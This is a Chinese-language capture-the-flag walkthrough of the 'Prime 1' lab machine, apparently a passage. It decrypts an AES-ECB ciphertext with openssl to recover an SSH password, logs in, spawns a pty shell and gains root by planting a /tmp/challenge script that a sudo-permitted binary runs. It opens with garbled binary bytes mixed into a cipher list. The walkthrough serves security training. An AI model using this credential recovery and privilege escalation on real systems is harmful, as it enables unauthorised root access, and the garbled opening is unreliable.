���K��F$��L����IF��u4�fE+.�-W����2
%�(�xC�E����s:�j��7��d�ئ!jc���S��2ʤcamellia-256-ecb
cast
cast5-cbc
cast5-cfb
F�?�<>�~�(�E}�5��\��▒S��4NZ硶Kt��A�fT���C�����R6�������7������-A|��5���Ƞ�`;R��c&m#m�T<x�cq=�oh�▒�0Wb�l��aB�aZ�z"��fTːq_ԙS���&Y�7�^;��]�9�t s�cast5-ecb
cast5-ofb
cast-cbc
des
des3
des-cbc
des-cfb
�Ղ�$�%�.�%��r�A�z��9�_�����;�E��f�|F:{��mfq2�j� >�<����0����Ӓ�������2�&?r�'��:k(#j�0N!���xU0��쯾6b�>���o)������des-ecb
+�D��L�Ҁ�7(��[x��%����E=�<>d&�N�\�D���
��c�*� �`���OjJ-�X�{�'��V�X{g��C▒J,�E
�7�W3η���T��^T��DK=���w�j��&��J?����h(Վ�dId�
6�z��i���FYDN
Q��gdes-ede
6^{�h�R�J-'�yAv/>c�GHA�זϞ�V����$�㢡U�oX�+(���{X���)#KB��g,�5��▒�]��r恘`�����e�9���H▒�k��n�D�i|a��<�\��Kc▒&9S�O��τjg�)�V��-�[7�=��ݹgT��Thdes-ede3
des-ede3-cbc
des-ede3-cfb
des-ede3-ofb
des-ede-cbc
des-ede-cfb
des-ede-ofb
des-ofb
desx
md4
md5
rc2
rc2-40-cbc
rc2-64-cbc
rc2-cbc
rc2-cfb
�>�kO;}r�HLp
��0�+y@�m�^������'���L9*�X�A9{G�+��"��@w���8��wģ�"�TE�����uq(f�rc2-ecb
rc2-ofb
����3�'�/?�PR�| {���B�t�r_���?3�&
����I�9/`�v�����vz~z�(���5��k��iG�[�<gG�▒���j`*/�f�2�
�VX�I.p�Y2DY4��=C��*���Rl!F��▒�t�fyE�<i��y!��MK�N� =�<rc4
����NEI�g�▒�?�L��7�Aˍ�ZV.D*��d���Ʀ�2�J���fԦW �<���,3���W��rIJ�q"��n���#雥��q����'��N6�(
A5-j��y]G!a��O��� z�[,?�T�r;rc4-40
rmd160
seed
seed-cbc
seed-cfb
+�� ��A��!�]v6
�q�▒{T�:�$���� �Qr������4Tԥ�OY�▒�MU�*��{H�$�%�6X��Vc�F�W,���&<�1�GE2��{����4��Q0�{^;!J*��טŮ��PdDXH��Ɍ �#�炅;�<DD��f�
tseed-ecb
seed-ofb
sha1
sha224
sha256
sha3-224
sha3-256
sha3-384
sha3-512
sha384
sha512
sha512-224
sha512-256
shake128
shake256
sm3
sm4-cbc
sm4-cfb
sm4-ctr
d��;�����c�?�>����=���)�,��Ǵx�]����+aT�Ja[�ˇ�����0�H����h�A��
pvyk���]!W�'�m�۽w�v^����n��᥊+���eB_ȓ��Jw�N���{7 ����d�B%A���e��/�7=��\sm4-ecb
sm4-ofb
zlib
zstd
看到
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,aes-256-ecb
直接用 aes-256-ecb 试试看,果然是这样
内容 : Victor 对 saket 说,如果你忘记了密码,就用老密码
密码是 tribute_to_ippsec
┌──(kali㉿kali)-[~/testPrime1]
└─$ echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,
直接 ssh 梭哈
┌──(kali㉿kali)-[~/testPrime1]
└─$ sudo ssh saket@192.168.50.153
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
The authenticity of host '192.168.50.153 (192.168.50.153)' can't be established.
ED25519 key fingerprint is SHA256:j4BjjDNA4iDRgwl0m3uHtlNdQm8M97LMWuNBsgHbxt0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.50.153' (ED25519) to the list of known hosts.
saket@192.168.50.153's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
661 packages can be updated.
515 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sat Aug 31 05:31:31 2019
$
拿到 saket 的 shell,ip 也是对的 (在初级的反弹 shell 中,用户是 www-data)
$ whoami
saket
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:5c:c7:58 brd ff:ff:ff:ff:ff:ff
inet 192.168.50.153/24 brd 192.168.50.255 scope global dynamic ens33
valid_lft 1691sec preferred_lft 1691sec
inet6 fe80::dc85:1101:d755:d6fc/64 scope link
valid_lft forever preferred_lft forever
$ ls
enc enc.txt key.txt password.txt user.txt
$
看看机器有没有装 python3 ,结果是有的
$ dpkg -l | python3
成了,芜湖 ✌
$ python -c "import pty;pty.spawn('/bin/bash')"
saket@ubuntu:~$
由 sudo -l 提示 能无密码的执行 /home/victor/undefeated_victor
执行后发现一句话 : …
文件/tmp/challenge没找到
saket@ubuntu:~$ whoami
saket
saket@ubuntu:~$ sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ strings /home/victor/undefeated_victor
strings: /home/victor/undefeated_victor: Permission denied
saket@ubuntu:~$ cd /home/victor/
saket@ubuntu:/home/victor$ ls -liah
ls: cannot open directory '.': Permission denied
saket@ubuntu:/home/victor$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:/home/victor$
那就创建文件/tmp/challenge,往里写点东西
提权成功
saket@ubuntu:~$ sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
saket@ubuntu:~$ echo '#!/bin/bash' > /tmp/challenge
saket@ubuntu:~$ echo '/bin/bash' >> /tmp/challenge
saket@ubuntu:~$ cat /tmp/challenge
#!/bin/bash
/bin/bash
saket@ubuntu:~$ chmod 777 /tmp/challenge
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:~#
找 flag , 拿下
root@ubuntu:/root# whoami
root
root@ubuntu:/root# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:5c:c7:58 brd ff:ff:ff:ff:ff:ff
inet 192.168.50.153/24 brd 192.168.50.255 scope global dynamic ens33
valid_lft 1178sec preferred_lft 1178sec
inet6 fe80::dc85:1101:d755:d6fc/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:/root# ls -liah
total 92K
917506 drwx------ 5 root root 4.0K Aug 31 2019 .
2 drwxr-xr-x 24 root root 4.0K Aug 29 2019 ..
964588 -rw------- 1 root root 8.4K Sep 19 02:12 .bash_history
917598 -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
917597 drwx------ 3 root root 4.0K Aug 30 2019 .cache
969793 -rwxr-xr-x 1 root root 14K Aug 30 2019 enc
969795 -rw-r--r-- 1 root root 305 Aug 30 2019 enc.cpp
969797 -rw-r--r-- 1 root root 237 Aug 30 2019 enc.txt
969798 -rw-r--r-- 1 root root 123 Aug 30 2019 key.txt
969791 -rw------- 1 root root 137 Aug 30 2019 .mysql_history
964098 drwxr-xr-x 2 root root 4.0K Aug 29 2019 .nano
917599 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
969794 -rw-r--r-- 1 root root 33 Aug 30 2019 root.txt
969796 -rw-r--r-- 1 root root 66 Aug 31 2019 .selected_editor
969780 -rw-r--r-- 1 root root 805 Aug 30 2019 sql.py
969790 -rwxr-xr-x 1 root root 442 Aug 31 2019 t.sh
964589 drwxr-xr-x 10 root root 4.0K Aug 30 2019 wfuzz
964464 -rw-r--r-- 1 root root 170 Aug 29 2019 wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
root@ubuntu:/root# sudo -l
Matching Defaults entries for root on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User root may run the following commands on ubuntu:
(ALL : ALL) ALL
root@ubuntu:/root#
总结
拿初级的反弹 shell,用户为 www-data
查看文件时看到 enc 的名字,想到 openssl 相关
用 find 找文件名为 backup 的备份文件,靶机适用
对于一般的用户使用习惯,/opt 中存放备份文件是一个特点
在备份文件中找到执行 enc 需要的密码
执行 enc 后,找到 enc.txt 和 key.txt
处理 key 使用 awk od tr , 把 ‘ippsec’ 的 md5 转为 hex
用 openssl 的语法,尝试加密方式,写脚本解密文,最终得到 saket 的 ssh 密码
登录进去后发现 sudo -l 找到一个文件,执行文件后发现每找到另一个文件(可能是软连接?)
就把文件创建并写一些内容,执行,拿到 root
结束